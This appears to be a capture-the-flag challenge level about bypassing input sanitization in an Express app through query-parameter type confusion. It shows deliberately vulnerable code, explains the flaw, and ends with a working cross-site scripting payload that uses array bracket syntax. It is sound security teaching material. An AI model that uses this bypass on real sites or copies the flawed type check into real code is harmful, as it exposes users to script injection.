Level 12: Express Type Confusion

MISSION: The server-side WAF perfectly sanitizes strings. Find a way to alter your GET request parameters so the backend sees an Array instead of a String, bypassing the WAF entirely.

/// SOURCE CODE INSPECTOR ///

// Backend Express Logic (Express 4 with its default "extended" query parser)
const express = require('express');
const app = express();

app.get('/', (req, res) => {
    let payload = req.query.payload;

    // FLAW: The developer assumes 'payload' is always a String.
    // If the attacker sends an Array (e.g., ?payload[]=1&payload[]=2),
    // the typeof check fails and the filter is skipped, but the '+'
    // operator still coerces the array (Array.prototype.toString, elements
    // joined with commas) straight into the HTML response, unescaped!

    if (typeof payload === 'string') {
        // Strict filter for strings (note: only < and > are escaped)
        payload = payload.replace(/</g, '&lt;').replace(/>/g, '&gt;');
    }

    res.send("<div id='log'>" + payload + "</div>");
});

app.listen(3000);

/// DECRYPTION COMPLETE ///

By default, Express.js parses duplicate URL parameters (and bracket syntax such as payload[]=) into an Array. The backend checks typeof payload === 'string' before applying the sanitization, so sending an array skips the if block entirely. String concatenation then coerces the array with Array.prototype.toString, its elements land in the response unescaped, and the browser executes the injected script. Note that Express 5 changed the default query parser to "simple": duplicate keys still become an array, but payload[] is then kept as a literal key name, so the bracket form of the payload only works against the "extended" (qs) parser.

Payload (Manually edit the URL):

?payload[]=<script>alert(1)</script>